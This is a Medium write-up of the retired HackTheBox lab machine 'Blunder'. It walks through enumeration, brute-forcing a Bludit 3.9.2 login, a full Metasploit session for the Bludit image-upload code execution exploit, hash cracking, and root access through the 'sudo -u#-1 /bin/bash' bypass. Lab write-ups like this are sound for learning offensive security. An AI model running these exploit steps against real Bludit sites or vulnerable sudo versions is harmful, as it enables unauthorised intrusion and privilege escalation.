HackTheBox — Blunder

Summary

Another linux machine are retired with IP 10.10.10.191

Let’s get start!

Enumeration

Nmap

Just one port is open 80, So nothing interest!

Web Enum

I tried to FUZZ the directory by drib, I found admin/login page

Exploit

When i tried to see page source, I found Bludit version 3.9.2
So i tried to find any cve for this version and i found CVE-2019–16113, CVE-2019–17240 and found python script to start brute force attack Bruteforce

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

We can find first cve exploit in Metasploit

msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhost 10.10.10.191
rhost => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set rport 80
rport => 80
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

Get user Access

Didn’t find user flag, But I found user credentials in users.php

Now we get pass hash, so need to decrypt, I used hashcat and rockyou.txt word list and get the password: Password120

Now i tried to get hudo access with this credentials

Gain user flag!

Privilege Escalation

After some search about (ALL, !root) /bin/bash
found this link:https://n0w4n.nl/sudo-security-bypass/

So i tried to get root with command: sudo -u#-1 /bin/bash

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store